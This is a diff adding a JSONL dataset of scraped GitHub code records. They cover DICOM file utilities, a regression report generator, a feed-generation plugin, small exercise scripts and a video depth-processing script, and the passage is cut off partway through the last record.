diff --git "a/3100.jsonl" "b/3100.jsonl" new file mode 100644--- /dev/null +++ "b/3100.jsonl" @@ -0,0 +1,715 @@ +{"seq_id":"74695030439","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Basic helper tools here\n\"\"\"\n\nimport os\nimport datetime\nimport json\nimport glob\nimport datetime\nimport numpy as np\nimport tarfile\nimport zipfile\nimport pydicom as dicom\nfrom tqdm import tqdm\n\n# =========================================================================\n## CONSTANTS\n# =========================================================================\nclass DicomTags(object):\n # these are based on keyword value\n Modality = 0x0008, 0x0060\n Manufacturer = 0x0008, 0x0070\n ManufacturerModelName = 0x0008, 0x1090\n SoftwareVersions = 0x0018, 0x1020\n StudyDescription = 0x0008, 0x1030\n SeriesDescription = 0x0008, 0x103e\n BodyPartExamined = 0x0018, 0x0015\n SliceThickness = 0x0018, 0x0050\n RepetitionTime = 0x0018, 0x0080\n EchoTime = 0x0018, 0x0081\n NumberOfAverages = 0x0018, 0x0083\n MagneticFieldStrength = 0x0018, 0x0087\n SpacingBetweenSlices = 0x0018, 0x0088\n TriggerTime = 0x0018, 0x1060\n NominalInterval = 0x0018, 0x1062\n HeartRate = 0x0018, 0x1088\n CardiacNumberOfImages = 0x0018, 0x1090\n TriggerWindow = 0x0018, 0x1094\n ReceiveCoilName = 0x0018, 0x1250\n AcquisitionMatrix = 0x0018, 0x1310\n FlipAngle = 0x0018, 0x1314\n PatientPosition = 0x0018, 0x5100\n ImagePositionPatient = 0x0020, 0x0032\n ImageOrientationPatient = 0x0020, 0x0037\n StudyInstanceUID = 0x0020, 0x000d\n SeriesInstanceUID = 0x0020, 0x000e\n SeriesNumber = 0x0020, 0x0011\n PixelSpacing = 0x0028, 0x0030\n StudyDate = 0x0008, 0x0020\n PatientName = 0x0010, 0x0010\n PatientID = 0x0010, 0x0020\n PatientDateOfBirth = 0x0010, 0x0030\n PatientSex = 0x0010, 0x0040\n InstanceNumber = 0x0020, 0x0013\n StudyID = 0x0020, 0x0010\n AccessionNumber = 0x0008, 0x0050\n\n\ndef getTagCode(tagName):\n return eval(\"DicomTags.%s\" % (tagName))\n\n\ndef getStdDicomTags():\n allVar = vars(DicomTags)\n res = []\n for iVar in allVar:\n val = getTagCode(iVar)\n if type(val) == tuple:\n if len(val) == 2:\n res.append(iVar)\n return res\n\n\ndef getDicomTagsDict():\n tt = getStdDicomTags()\n return dict(zip([i for i in tt], [eval(\"DicomTags.%s\" % (i)) for i in tt]))\n\n\ndef countFilesInDir(dirName):\n files = []\n if os.path.isdir(dirName):\n for path, dirs, filenames in os.walk(dirName): # @UnusedVariable\n files.extend(filenames)\n return len(files)\n\nclass NumpyEncoder(json.JSONEncoder):\n \"\"\" Special json encoder for numpy types \"\"\"\n def default(self, obj):\n self.ensure_ascii = False\n if isinstance(obj, np.integer):\n return int(obj)\n elif isinstance(obj, np.floating):\n return float(obj)\n elif isinstance(obj, np.ndarray):\n return obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\n\ndef writeDictionaryToJSON(fileName, dictToWrite):\n with open(fileName, 'w') as fp:\n json.dump(dictToWrite, fp, indent=4, sort_keys=True, cls=NumpyEncoder, ensure_ascii=False)\n return fileName\n\ndef parseJsonToDictionary(fileName):\n with open(fileName, 'r') as fid:\n myDict = json.load(fid)\n return myDict\n\ndef fixPath(p):\n return p.encode('utf8', 'ignore').strip().decode()\n\ndef cleanString(ss):\n if not type(ss) == str:\n return ss\n ss = ss.replace('^', '-')\n ss = ss.replace(' ', '_')\n keepcharacters = ('-', '.', '_', 'ö','ü','ä','é','è','à')\n ss = \"\".join([c for c in ss if (c.isalnum() or (c.lower() in keepcharacters))]).rstrip()\n try:\n if ss[-1] == '.':\n ss = ss[:-1]\n except IndexError:\n pass\n return fixPath(ss)\n\n\ndef dbDateToDateTime(dbDate):\n try:\n return datetime.datetime.strptime(dbDate, '%Y%m%d')\n except ValueError:\n return datetime.datetime.strptime(dbDate, '%Y%m%dT%H%M%S')\n\n\ndef distPts(pt1, pt2):\n try:\n dist = np.sqrt((pt1[0] - pt2[0]) ** 2 + (pt1[1] - pt2[1]) ** 2 + (pt1[2] - pt2[2]) ** 2)\n except IndexError:\n dist = np.sqrt((pt1[0] - pt2[0]) ** 2 + (pt1[1] - pt2[1]) ** 2)\n return dist\n\n\ndef _isCompressed(ds):\n \"\"\"\n Check if dicom dataset is compressed or not\n \"\"\"\n uncompressed_types = [\"1.2.840.10008.1.2\",\n \"1.2.840.10008.1.2.1\",\n \"1.2.840.10008.1.2.1.99\",\n \"1.2.840.10008.1.2.2\"]\n\n if ('TransferSyntaxUID' in ds.file_meta) and (ds.file_meta.TransferSyntaxUID in uncompressed_types):\n return False\n elif 'TransferSyntaxUID' not in ds.file_meta:\n return False\n return True\n\ndef instanceNumberSortKey(val):\n try:\n return int(__getTags(val, ['InstanceNumber'])['InstanceNumber'])\n except (ValueError, IOError, AttributeError):\n return 99e99\n\ndef sliceLoc_InstanceNumberSortKey(val):\n try:\n return (float(__getTags(val, ['SliceLocation'])['SliceLocation']), float(__getTags(val, ['InstanceNumber'])['InstanceNumber']))\n except (ValueError, IOError, AttributeError):\n return (99e9, 99e9)\n\ndef __getTags(dataset, tagsList):\n tagsDict = {}\n for iKey in tagsList:\n tagsDict[iKey] = dataset.get(iKey, 'Unknown')\n return tagsDict\n\n\ndef getRootDirWithSEdirs(startDir):\n \"\"\"\n Search from startDir until find rootDir with format of subdirs:\n SE123_\n ... etc\n param1: start directory of search\n return: rootdirectory with subfolders of SE{int}_ format (startDir if not found)\n \"\"\"\n\n def __isSEDirFormat(dd):\n if dd[:2] == \"SE\":\n try:\n int(dd.split(\"_\")[0][2:])\n except ValueError:\n return False\n return True\n return False\n\n dicomRootDir = startDir\n for root, dirs, _ in os.walk(startDir):\n if any([__isSEDirFormat(dd) for dd in dirs]):\n dicomRootDir = root\n break\n return dicomRootDir\n\n\ndef seriesNumbersToDicomDirList(dicomRootDir, seriesNumbers):\n if not type(seriesNumbers) == list:\n seriesNumbers = [seriesNumbers]\n dicomRootDir = getRootDirWithSEdirs(dicomRootDir)\n SEList = os.listdir(dicomRootDir)\n dicomDirs = []\n for iSE in seriesNumbers:\n ii = [jj for jj in SEList if \"SE%d\" % (iSE) in jj.split('_')]\n dicomDirs.append(os.path.join(dicomRootDir, ii[0]))\n return dicomDirs\n\n\ndef walkdir(folder):\n \"\"\"Walk through each files in a directory\"\"\"\n for dirpath, _, files in os.walk(folder):\n for filename in files:\n yield os.path.abspath(os.path.join(dirpath, filename))\n\n\ndef getDicomDictFromTar(tarFileToRead, QUIET=True, FORCE_READ=False, FIRST_ONLY=False, OVERVIEW_ONLY=False,\n matchingTagValuePair=None):\n # for sub dir in tar get first dicom - return list of ds\n dsDict = {}\n if tarFileToRead.endswith('gz'):\n tar = tarfile.open(tarFileToRead, \"r:gz\")\n else:\n tar = tarfile.open(tarFileToRead)\n successReadDirs = set()\n for member in tar:\n if member.isfile():\n root = os.path.split(member.name)[0]\n if FIRST_ONLY and (root in successReadDirs):\n continue\n thisFile=tar.extractfile(member)\n try:\n dataset = dicom.read_file(thisFile, stop_before_pixels=OVERVIEW_ONLY, force=FORCE_READ)#, specific_tags=['StudyInstanceUID','SeriesInstanceUID'])\n if matchingTagValuePair is not None:\n if dataset.get(matchingTagValuePair[0], 'NIL') != matchingTagValuePair[1]:\n continue\n studyUID = str(dataset.StudyInstanceUID)\n seriesUID = str(dataset.SeriesInstanceUID)\n if studyUID not in dsDict:\n dsDict[studyUID] = {}\n if seriesUID not in dsDict[studyUID]:\n dsDict[studyUID][seriesUID] = []\n dsDict[studyUID][seriesUID].append(dataset)\n\n if FIRST_ONLY:\n successReadDirs.add(root)\n except dicom.filereader.InvalidDicomError:\n if not QUIET:\n print('FAIL: %s'%(thisFile))\n tar.close()\n return dsDict\n\n\ndef getDicomDictFromZip(zipFileToRead, QUIET=True, FORCE_READ=False, FIRST_ONLY=False, OVERVIEW_ONLY=False,\n matchingTagValuePair=None):\n \"\"\"Read a zip archive, extract dicoms to structures dictionary\n \"\"\"\n dsDict = {}\n with zipfile.ZipFile(zipFileToRead) as zf:\n for file in zf.namelist():\n with zf.open(file) as thisFile:\n try:\n dataset = dicom.read_file(thisFile, stop_before_pixels=OVERVIEW_ONLY, force=FORCE_READ)\n if matchingTagValuePair is not None:\n if dataset.get(matchingTagValuePair[0], 'NIL') != matchingTagValuePair[1]:\n continue\n studyUID = str(dataset.StudyInstanceUID)\n seriesUID = str(dataset.SeriesInstanceUID)\n if studyUID not in dsDict:\n dsDict[studyUID] = {}\n if seriesUID not in dsDict[studyUID]:\n dsDict[studyUID][seriesUID] = []\n dsDict[studyUID][seriesUID].append(dataset)\n\n if FIRST_ONLY:\n return dsDict\n except dicom.filereader.InvalidDicomError:\n if not QUIET:\n print('FAIL: %s'%(thisFile))\n return dsDict\n\ndef anonymiseDicomDS(dataset, anon_birthdate=True, remove_private_tags=True, anonName=None):\n # Define call-back functions for the dataset.walk() function\n def PN_callback(ds, data_element):\n \"\"\"Called from the dataset \"walk\" recursive function for all data elements.\"\"\"\n if data_element.VR == \"PN\":\n data_element.value = 'anonymous'\n if \"Institution\" in data_element.name:\n data_element.value = 'anonymous'\n if (anonName is not None) & (data_element.name == \"Patient's Name\"):\n data_element.value = anonName\n # Remove patient name and any other person names\n try:\n dataset.walk(PN_callback)\n except TypeError: # TODO config setting to control level of warnings for this. \n pass\n # Change ID\n dataset.PatientID = ''\n # Remove data elements (should only do so if DICOM type 3 optional)\n # Use general loop so easy to add more later\n # Could also have done: del ds.OtherPatientIDs, etc.\n for name in ['OtherPatientIDs', 'OtherPatientIDsSequence', 'PatientAddress']:\n if name in dataset:\n delattr(dataset, name)\n if anon_birthdate:\n for name in ['PatientBirthDate']:\n if name in dataset:\n dataset.data_element(name).value = ''\n # Remove private tags if function argument says to do so.\n if remove_private_tags:\n try:\n dataset.remove_private_tags()\n except TypeError:\n pass\n return dataset\n\ndef getSaveFileNameFor_ds_UID(ds, outputRootDir):\n destFile = os.path.join(outputRootDir, ds.PatientID, ds.StudyInstanceUID, ds.SeriesInstanceUID, __getDSSaveFileName(ds, SAFE_NAMING=True))\n return destFile\n\ndef getSaveFileNameFor_ds(ds, outputRootDir):\n destFile = os.path.join(outputRootDir, getPatientDirName(ds), getStudyDirName(ds), getSeriesDirName(ds), __getDSSaveFileName(ds, SAFE_NAMING=False))\n return destFile\n\ndef getPatientDirName(ds):\n try:\n return cleanString(f'{ds[DicomTags.PatientName].value}_{ds[DicomTags.PatientID].value}')\n except (TypeError, KeyError, AttributeError):\n try:\n return ds.PatientID\n except AttributeError:\n return ''\n \ndef getStudyDirName(ds):\n try:\n \n return cleanString(f'{ds[DicomTags.StudyDate].value}_{ds[DicomTags.StudyID].value}')\n except (TypeError, KeyError, AttributeError):\n return ds.StudyInstanceUID\n \ndef getSeriesDirName(ds):\n try:\n return cleanString(f'SE{ds[DicomTags.SeriesNumber].value}_{ds[DicomTags.SeriesDescription].value}')\n except (TypeError, KeyError, AttributeError):\n return ds.SeriesInstanceUID\n \n\ndef __getDSSaveFileName_Safe(ds):\n return 'IM-%s.dcm'%(ds.SOPInstanceUID)\n\ndef __getDSSaveFileName(ds, SAFE_NAMING):\n if SAFE_NAMING:\n return __getDSSaveFileName_Safe(ds)\n try:\n return 'IM-%05d-%05d.dcm'%(int(ds.SeriesNumber),\n int(ds.InstanceNumber))\n except (TypeError, KeyError, AttributeError):\n return __getDSSaveFileName_Safe(ds)\n\ndef getDicomFileIdentifierStr(ds):\n strOut = f'{ds[DicomTags.PatientName].value}_{ds[DicomTags.PatientID].value}_' +\\\n f'{ds[DicomTags.StudyDate].value}_{ds[DicomTags.SeriesNumber].value}_{ds[DicomTags.InstanceNumber].value}'\n return cleanString(strOut)\n\ndef writeOut_ds(ds, outputRootDir, anonName=None, WRITE_LIKE_ORIG=True, SAFE_NAMING=False):\n destFile = os.path.join(outputRootDir, __getDSSaveFileName(ds, SAFE_NAMING))\n os.makedirs(outputRootDir, exist_ok=True)\n if anonName is not None:\n try:\n ds = anonymiseDicomDS(ds, anonName=anonName)\n except NotImplementedError:\n pass\n ds.save_as(destFile, write_like_original=WRITE_LIKE_ORIG)\n return destFile\n\ndef streamDicoms(inputDir, outputDir, FORCE_READ=False, HIDE_PROGRESSBAR=False, SAFE_NAMING=False):\n nFiles = countFilesInDir(inputDir)\n for thisFile in tqdm(walkdir(inputDir), total=nFiles, leave=True, disable=HIDE_PROGRESSBAR):\n if 'dicomdir' in os.path.split(thisFile)[1].lower():\n continue\n if thisFile.endswith('json'):\n continue\n try:\n dataset = dicom.dcmread(thisFile, force=FORCE_READ, stop_before_pixels=False)\n if SAFE_NAMING: \n fOut = getSaveFileNameFor_ds_UID(dataset, outputDir)\n else:\n fOut = getSaveFileNameFor_ds(dataset, outputDir)\n os.makedirs(os.path.split(fOut)[0], exist_ok=True)\n dataset.save_as(fOut, write_like_original=False)\n except dicom.filereader.InvalidDicomError:\n continue\n\ndef readDicomFile_intoDict(dcmFile, dsDict, FORCE_READ=False, OVERVIEW=False):\n # Reading specific tags is actually slower. \n # dataset = dicom.dcmread(thisFile, specific_tags=['StudyInstanceUID','SeriesInstanceUID'], stop_before_pixels=OVERVIEW, force=FORCE_READ)\n dataset = dicom.dcmread(dcmFile, stop_before_pixels=OVERVIEW, force=FORCE_READ)\n studyUID = str(dataset.StudyInstanceUID)\n seriesUID = str(dataset.SeriesInstanceUID)\n if studyUID not in dsDict:\n dsDict[studyUID] = {}\n if seriesUID not in dsDict[studyUID]:\n dsDict[studyUID][seriesUID] = []\n dsDict[studyUID][seriesUID].append(dataset)\n\ndef organiseDicomHeirachyByUIDs(rootDir, HIDE_PROGRESSBAR=False, FORCE_READ=False, ONE_FILE_PER_DIR=False, OVERVIEW=False, DEBUG=False):\n dsDict = {}\n successReadDirs = set()\n nFiles = countFilesInDir(rootDir)\n for thisFile in tqdm(walkdir(rootDir), total=nFiles, leave=True, disable=HIDE_PROGRESSBAR):\n if 'dicomdir' in os.path.split(thisFile)[1].lower():\n continue\n if thisFile.endswith('json'):\n continue\n if ONE_FILE_PER_DIR:\n thisDir, ff = os.path.split(thisFile)\n if thisDir in successReadDirs:\n continue\n try:\n readDicomFile_intoDict(thisFile, dsDict, FORCE_READ=FORCE_READ, OVERVIEW=OVERVIEW)\n if ONE_FILE_PER_DIR:\n successReadDirs.add(thisDir)\n except dicom.filereader.InvalidDicomError:\n if DEBUG:\n print('Error reading %s'%(thisFile))\n continue\n return dsDict\n\n\ndef _writeDirectoryToNII(dcmDir, outputPath, fileName):\n dcm2niiCmd = \"dcm2nii -p n -e y -d n -x n -o '%s' '%s'\"%(outputPath, dcmDir)\n print('RUNNING: %s'%(dcm2niiCmd))\n os.system(dcm2niiCmd)\n list_of_files = glob.glob(os.path.join(outputPath, '*.nii.gz')) \n latest_file = max(list_of_files, key=os.path.getctime)\n newFileName = os.path.join(outputPath, fileName)\n os.rename(latest_file, newFileName)\n print('Made %s --> as %s'%(latest_file, newFileName))\n return newFileName\n\ndef buildFakeDS():\n meta = dicom.dataset.FileMetaDataset()\n meta.FileMetaInformationVersion = b\"\\x00\\x01\"\n meta.TransferSyntaxUID = (\"1.2.840.10008.1.2.1\") # std transfer uid little endian, implicit vr\n meta.ImplementationVersionName = \"spydcmtk\"\n ds = dicom.dataset.FileDataset(f'/tmp/{dicom.uid.generate_uid()}.dcm', {}, file_meta=meta, preamble=b\"\\0\" * 128)\n ds.add_new([0x0008,0x0005], 'CS', 'ISO_IR 100')\n ds.add_new([0x0008,0x0016], 'UI', 'SecondaryCaptureImageStorage')\n ds.add_new([0x0008,0x0018], 'UI', dicom.uid.generate_uid())\n ds.add_new([0x0008,0x0020], 'DA', '20000101')\n ds.add_new([0x0008,0x0030], 'TM', '101010')\n ds.add_new([0x0008,0x0060], 'CS', 'MR')\n ds.add_new([0x0020,0x000d], 'UI', dicom.uid.generate_uid())\n ds.add_new([0x0020,0x000e], 'UI', dicom.uid.generate_uid())\n ds.add_new([0x0028,0x0002], 'US', 1)\n ds.add_new([0x0028,0x0004], 'CS', 'MONOCHROME2')\n ds.add_new([0x0028,0x0103], 'US', 0)\n ##\n ds.add_new([0x0010,0x0010], 'PN', \"TEST^DATA\")\n ds.add_new([0x0010,0x0020], 'LO', '12345')\n ds.fix_meta_info()\n return ds\n\n","repo_name":"fraser29/spydcmtk","sub_path":"spydcmtk/dcmTools.py","file_name":"dcmTools.py","file_ext":"py","file_size_in_byte":17348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35499236331","text":"import pandas as pd\nimport numpy as np\n\nfrom logger import get_logger\nfrom sklearn.metrics import mean_absolute_percentage_error\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n# Logger\nlogger = get_logger(__name__)\n\ndef generate_report(modelo,X_test,y_test,score):\n \"\"\"Essa função gera um relatório de performance do modelo de regressão em formato csv e salva no diretório local.\n Além disso essa função gera um gráfico de predições versus valores reais e salva no diretório local.\n\n Parameters\n ----------\n modelo : object\n Modelo já treinado\n X_test : numpy.array\n Features do conjunto de teste\n y_test : numpy.array\n Target do conjunto de teste\n score : numpy.array\n Array com os valore do erro médio absoluto percentual obtidos durante o processo de validação cruzada\n \"\"\"\n try:\n logger.info(\"Criando relatório de Performance:\")\n y_pred = modelo.predict(X_test)\n # Vamos calcular o MSE (Mean Squared Error)\n mse = np.mean((y_test - y_pred) ** 2)\n rmse = np.sqrt(mse)\n mape= mean_absolute_percentage_error(y_test, y_pred)\n\n res= pd.DataFrame({'CV Média':[-score.mean()],\n 'CV Std':[score.std()],\n 'Testset-MSE':mse,\n 'Testset-RMSE':rmse,\n 'Testset-MAPE':mape,\n })\n \n \n logger.info(\"Relatório de Performance:\")\n logger.info('\\n \\t'+ res.to_string().replace('\\n', '\\n\\t'))\n\n\n res.to_csv(\"./results.csv\",index=False)\n\n logger.info('Gerando gráficos de Predições vs Target')\n dados = pd.DataFrame({'y_test':y_test,'Predições':y_pred})\n plt.figure(figsize=(18,10))\n sns.lineplot(data=dados, markers=True)\n plt.savefig('./pred_vs_real.png')\n \n except Exception as e:\n logger.critical(f'Não foi possível gerar o relatório de performance',exc_info=True)\n\n","repo_name":"EulerFaria/proficam_aula","sub_path":"training/generate_report.py","file_name":"generate_report.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"46740800124","text":"class Solution(object):\n def chalkReplacer(self, chalk, k):\n total = 0\n for i in chalk:\n total += i\n remainder = k % total\n if remainder==0:\n return 0\n for i in range(len(chalk)):\n remainder -= chalk[i]\n if remainder < 0:\n return i","repo_name":"genzebalemu/a2sv","sub_path":"prefix sum/student whose replace chalk.py","file_name":"student whose replace chalk.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27837123721","text":"def shares(prompt, type):\n while True:\n try:\n sharenum = type(input(prompt))\n return sharenum\n except ValueError:\n print(\"Invalid number!\")\n\ndef priceinp(sharenum):\n while True:\n try:\n price = input(\"Enter price (dollars, numerator, denominator): \")\n d, n, de = price.split()\n d, n, de = int(d), int(n), int(de)\n price = str(d) + \" \" + str(n) + \"/\" + str(de)\n return price\n except ValueError:\n print(\"Invalid price!\")\n\ndef value(pricestr, sharenum):\n while True:\n try: \n pricestr = pricestr.replace(\"/\", \" \")\n d, n, de = pricestr.split()\n value = (int(d) + (int(n) / int(de) ))*sharenum\n value = format(value, '.2f')\n return value\n except ValueError:\n print(\"Invalid price!\")\n \ndef printout(numofshares, price, value):\n print(numofshares, \"shares with market price\", price, \"have value $\" + str(values))\n\ndef again():\n x = input(\"Continue: \")\n x = x.lower()\n if x != 'y':\n return False\n else:\n return True\n\na = True\nwhile a == True:\n numofshares = shares(\"Enter number of shares: \", int)\n price = priceinp(numofshares)\n values = value(price, numofshares)\n printout(numofshares, price, value)\n a = again()","repo_name":"antonbui/Forritun2018","sub_path":"Skilaverkefni4/priceOfStock.py","file_name":"priceOfStock.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35514523596","text":"import logging\nfrom urllib.parse import urljoin\n\nfrom bs4 import BeautifulSoup\nfrom feedgen.feed import FeedGenerator\n\nlogger = logging.getLogger('flamingo.plugins.Feeds')\n\n\ndef make_urls_absolute(html, base_url):\n soup = BeautifulSoup(html, 'html.parser')\n\n for element in soup.find_all(['img', 'script', 'asciinema-player']):\n try:\n element['src'] = urljoin(base_url, element['src'])\n except KeyError:\n # not all elements might have a src attribute\n continue\n\n for link in soup.find_all('a'):\n try:\n link['href'] = urljoin(base_url, link['href'])\n except KeyError:\n # not all elements might have an href attribute\n continue\n\n return str(soup)\n\n\nclass Feeds:\n def pre_build(self, context):\n FEEDS_DOMAIN = getattr(context.settings, 'FEEDS_DOMAIN', '/')\n FEEDS = getattr(context.settings, 'FEEDS', [])\n\n for feed_config in FEEDS:\n try:\n content = {\n 'type': 'feed',\n 'feed_type': feed_config['type'],\n 'output': feed_config['output'],\n 'url': '/' + feed_config['output'],\n }\n\n if 'lang' in feed_config:\n content['lang'] = feed_config['lang']\n\n fg = FeedGenerator()\n\n if 'lang' in feed_config:\n fg.language(feed_config['lang'])\n\n fg.id(feed_config['id'])\n fg.title(feed_config['title'])\n\n # set parameters needed for rss-feeds\n if feed_config['type'] in ['rss', 'podcast']:\n fg.description(feed_config['description'])\n fg.link(href=feed_config['link'], rel='self')\n fg.link(\n href=feed_config['link_alternate'], rel='alternate'\n )\n\n # setup podcast environment\n if feed_config['type'] == 'podcast':\n fg.load_extension('podcast')\n fg.podcast.itunes_image(feed_config['podcast_image'])\n if 'itunes_owner' in feed_config:\n fg.podcast.itunes_owner(**feed_config['itunes_owner'])\n if 'itunes_category' in feed_config:\n fg.podcast.itunes_category(\n feed_config['itunes_category']\n )\n if 'itunes_explicit' in feed_config:\n fg.podcast.itunes_explicit(\n feed_config['itunes_explicit']\n )\n if 'itunes_author' in feed_config:\n fg.podcast.itunes_author(feed_config['itunes_author'])\n\n for i in feed_config['contents'](context):\n fe = fg.add_entry()\n\n # setup required entry attributes\n fe_title = i['title'] or i['content_title']\n\n fe_link = {\n 'href': '{}{}'.format(FEEDS_DOMAIN, i['url']),\n 'rel': 'alternate'\n }\n\n if 'entry-id' in feed_config:\n fe_id = feed_config['entry-id'](i)\n\n else:\n fe_id = i['output']\n\n if 'updated' in feed_config:\n fe_updated = feed_config['updated'](i)\n else:\n fe_updated = ''\n\n if 'published' in feed_config:\n fe_published = feed_config['published'](i)\n else:\n fe_published = ''\n\n if 'podcast' in i:\n fe_podcast_url = i['podcast'].get('url', '')\n fe_podcast_size = i['podcast'].get('size', 0)\n fe_podcast_type = i['podcast'].get(\n 'type', 'audio/mpeg'\n )\n else:\n fe_podcast_url = ''\n fe_podcast_size = ''\n # default value; will never be reported as missing\n fe_podcast_type = 'audio/mpeg'\n\n # check entry attributes\n missing_attributes = []\n\n if not fe_id:\n missing_attributes.append('id')\n\n if not fe_title:\n missing_attributes.append('title')\n\n if not fe_updated:\n missing_attributes.append('updated')\n\n if not fe_published:\n missing_attributes.append('published')\n\n if feed_config['type'] == 'podcast':\n if not fe_podcast_url:\n missing_attributes.append('podcast->url')\n if not fe_podcast_size:\n missing_attributes.append('podcast->size')\n\n if missing_attributes:\n logger.error('%s is missing attributes: %s',\n i['path'] or i['i18n_path'] or i,\n ', '.join(missing_attributes))\n\n return\n\n # optional attributes\n fe.id(fe_id)\n fe.title(fe_title)\n fe.updated(fe_updated)\n fe.published(fe_published)\n fe.link(fe_link)\n\n if i['content_body']:\n exitcode, output = context.pre_render(i)\n output = make_urls_absolute(output, fe_link['href'])\n\n if 'html_filter' in feed_config:\n output = feed_config['html_filter'](output)\n fe.content(output, type='html')\n\n if i['authors']:\n for author in i['authors']:\n fe.author({\n 'name': author,\n })\n\n if i['summary']:\n summary = str(i['summary'])\n if 'html_filter' in feed_config:\n summary = feed_config['html_filter'](summary)\n fe.summary(summary, type='html')\n\n if feed_config['type'] == 'podcast':\n fe.enclosure(\n fe_podcast_url,\n str(fe_podcast_size),\n fe_podcast_type,\n )\n\n # generate output\n if feed_config['type'] == 'atom':\n content['content_body'] = fg.atom_str().decode()\n\n elif feed_config['type'] in ['rss', 'podcast']:\n content['content_body'] = fg.rss_str().decode()\n else:\n raise ValueError(f'Unkown Feed type {feed_config[\"type\"]}')\n\n context.contents.add(**content)\n\n except Exception:\n logger.error(\"feed '%s' setup failed\", feed_config['id'],\n exc_info=True)\n","repo_name":"pengutronix/flamingo","sub_path":"flamingo/plugins/feeds.py","file_name":"feeds.py","file_ext":"py","file_size_in_byte":7299,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"18"} +{"seq_id":"74472314919","text":"# script2_find.py\n# find the best and worst idea based on sentiment analysis\n\n# modules\nimport pandas as pd\nfrom HW3_functions import find_Ideas\n\ndef main():\n # load the data\n df = pd.read_csv('merged_data.csv', index_col=0)\n\n # find ideas\n the_best, the_worst = find_Ideas(df)\n print('The best idea is [', the_best[1], ']')\n print('The polarity of the idea is', the_best[0])\n print()\n print('The worst idea is [', the_worst[1], ']')\n print('The polarity of the idea is', the_worst[0])\n\n return\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Acatsama0871/FE-595-HW3-Sentiment-Sorting","sub_path":"script2_find.py","file_name":"script2_find.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33821448360","text":"#!/usr/bin/python\n\nfrom utils import extract_frames, downscale_frames, images_to_video, interp_, coords_trans_face\nfrom filter import kf2d, kf3d\nfrom cvd_utils import *\n\nimport subprocess\nimport shutil\nimport os, zipfile, sys\n\n\ndef cvd_main_process():\n # =============================================================================\n # downscale video for openpose\n # =============================================================================\n folder_id = sys.argv[1]\n\n os.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\n\n #root_dir = os.getcwd()\n root_dir = \"\"\n # root_dir = root_dir + '\\..'\n print(root_dir)\n # clip_id = 3\n # sub_id = 2\n act = 'walking3'\n # path = '../TC_S'+str(sub_id)+'_'+act+'_cam1/'\n path = root_dir + '/temp/'+folder_id+\"/\"\n\n extension = \".zip\"\n for item in os.listdir(path): # loop through items in dir\n if item.endswith(extension): # check for \".zip\" extension\n file_name = \"temp/\"+folder_id+\"/\"+item # get full path of files\n print(file_name)\n zip_ref = zipfile.ZipFile(file_name) # create zipfile object\n zip_ref.extractall(path+'CVD_result/') # extract file to dir\n zip_ref.close() # close file\n os.remove(file_name) # delete zipped file\n \n video_file = path + 'step_1_result.mp4'\n # frame_dir = path + '/clip' + str(clip_id) + '/'\n frame_dir = path + 'clip/'\n ext = 'png'\n\n if not os.path.exists(frame_dir): # if not extracted video into frames, do it\n extract_frames(video_file, frame_dir) # video in frames\n\n subdir = frame_dir[:-1] + '_downscale'\n if not os.path.exists(subdir): # if not downscaled, do it\n downscale_frames(\n subdir=subdir, ext=ext, full_subdir=frame_dir\n )\n\n # output_vid_file = 'clip.mp4'\n output_vid_file = root_dir + '/temp/' + folder_id + '/clip.mp4'\n images_to_video(subdir, output_vid_file) # frames back into a video\n\n # if not exist, call openpose with cmd\n # openpose_dir = 'C:/Users/Xulia/Downloads/openpose/'\n openpose_dir = '/openpose/'\n os.chdir(openpose_dir)\n # j2d_dir = 'C:/Users/Xulia/Desktop/maei/az/' + str(clip_id) + '_2dj'\n j2d_dir = root_dir + '/temp/' + folder_id + '/tmp_2dj'\n if not os.path.exists(j2d_dir):\n command = [\n './build/examples/openpose/openpose.bin', '--video', output_vid_file, '--write_json',\n j2d_dir, '--render_pose=0', '--no_gui_verbose', '--display=0', '--cli_verbose=1'\n ]\n print(f'Running \\\"{\" \".join(command)}\\\"')\n subprocess.call(command)\n\n frame_count = len(os.listdir(j2d_dir))\n res = []\n for i in range(frame_count):\n full_file = \"%s/clip_%012d_keypoints.json\" % (j2d_dir, i)\n r = load_torso(full_file)\n res.append(r)\n\n res = np.array(res).reshape(-1, 3)\n\n # =============================================================================\n # change back to project dir\n # replace previous subx, suby with openpose detected joints\n # =============================================================================\n\n # os.chdir('E:/2021_Fall/global_motion/src')\n # os.chdir(root_dir)\n os.chdir(\"/\")\n # delete temporal foler and mp4 file\n shutil.rmtree(frame_dir)\n shutil.rmtree(subdir)\n os.remove(output_vid_file)\n\n dt_path = root_dir + '/temp/' + folder_id + '/CVD_result/content/family_run_output'\n num_frames = 500\n frame_Path_midas = dt_path + '/R0-' + str(\n num_frames) + '_hierarchical2_midas2/StD100.0_StR1.0_SmD0_SmR0.0/depth_e0000/depth'\n frame_Path_filtered = dt_path + '/R0-' + str(\n num_frames) + '_hierarchical2_midas2/StD100.0_StR1.0_SmD0_SmR0.0/depth_e0000/e0000_filtered/depth'\n\n # load saved cam_params per frame\n camera_path = dt_path + '/camera_params'\n\n # =============================================================================\n # 1. downsample dynamic masked img to [1, 384, 224]\n # 2. locate ids of 0 in mask, search corredsponding depth at body center\n # 3. load cam params and calculate 3d motion\n # =============================================================================\n # step1:\n # subdir = dt_path + '/dynamic_mask_downscale'\n # full_subdir = dt_path + '/dynamic_mask'\n # ext = 'png'\n # align = 32\n # if not os.path.exists(subdir): #downscale dynamic mask if hasn't done yet\n # downscale_frames(\n # subdir=subdir, ext=ext, full_subdir=full_subdir\n # )\n\n frame_count = min(len(os.listdir(camera_path)), len(res))\n print(frame_count)\n\n # frame_count = 